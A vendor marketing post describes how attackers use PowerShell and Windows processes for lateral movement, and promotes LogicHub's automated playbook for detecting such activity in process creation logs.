When attackers breach a network, they don’t just grab the first data they find and shut down their attack, content with having broken through defenses and made an illicit gain. Instead, they get busy, even if they pause now and then to avoid detection. They usually move “laterally,” exploring the network to discover what systems and services you have in place, and search for more vulnerabilities and assets to steal or compromise.
As part of this lateral movement, they run processes on Windows endpoints. Many of these processes use PowerShell, a Windows command-line-executor and scripting language designed to automate routine tasks for administrators. Since Microsoft released PowerShell 6.0 as an open source project in 2016, malicious use of PowerShell has skyrocketed. PowerShell malware grew 432 percent between 2016 and 2017, according to McAfee Labs. Today if a network is under attack, PowerShell activities may be a primary line of attack.
Fortunately, organizations have a line of defense, even if initially it seems precariously narrow. When attackers use PowerShell or other types of Windows processes, the processes they create are logged in in Windows process creation logs. In a typical enterprise, millions of these log entries are likely being generated and collected daily. The high volume of these entries makes it difficult to identify the log entries tied to suspicious or outright malicious events.
Windows processes turn out to be another critical challenge for security analysts and Security Operations Centers (SOCs). Attackers are on the move, creating or deleting files, changing file permissions, downloading malware, creating accounts and performing other nefarious activities. These activities are being logged. But culling through these enormous log files for indications of attacks can be time-consuming, and time is something that SOC teams never have enough of.
Fortunately, security automation leveraging machine learning can help.
Introducing the LogicHub Windows Process Creation Events Playbook
LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques and mapped them to the MITRE ATT&CK framework, a public knowledge base of adversary tactics and techniques that MITRE has compiled based on real-world observations. Using MITRE’s detailed descriptions of recent attacks using Windows processes and PowerShell malware, LogicHub has created an executable playbook for detecting and stopping security attacks. The playbook runs on the LogicHub SOAR+ platform, the only security automation platform that surpasses traditional Security Orchestration and Automated Response (SOAR) capabilities by automating threat hunting, alert triage, and incident response.
Major capabilities in this pre-built playbook include:
- Process Chain Monitoring
The playbook racks process execution logs to identify “process chains” to track the sequence of process executions, then uses a machine learning algorithm to compare against known good and known bad behavior (including “Living Off the Land Binaries” [aka “LOLBins”]: built-in Windows commands that are often used by attackers and malicious code) to predict whether a particular chain is likely to be malicious.
- Automated PowerShell Command Triage
De-obfuscates and analyzes PowerShell commands, factoring in hundreds of patterns and a machine learning classifier trained on your organizations data.
The LogicHub Windows Process Creation Events playbook identifies suspicious and malicious events with the accuracy of an experienced threat hunting team, but with the speed and convenience of AI-powered automated analysis. The playbook shortcuts the need for months of detection content development and tuning by automatically sorting through the noise of benign events to pick out the clear signals of incipient or active attacks. SOCs can have the playbook up and running after just a few hours, immediately improving their ability to detect threats and defend against attacks.
The Windows Process Creation Events Playbook is just one of many playbooks available on the LogicHub Security Automation platform. LogicHub customers can also build custom playbooks to meet their own security requirements.
The LogicHub platform is the only security automation platform that delivers autonomous detection and response for security analysts. By applying machine learning and analytics on vast sets of event data, LogicHub automates security analyst workflows and decisions, helping teams save time, find critical threats, and eliminate false positives. LogicHub also provides a full explanation of the scoring logic to help security analysts review and validate results.
To learn more about the LogicHub Windows Process Creation Events Playbook, read our use case or contact a LogicHub sales representative.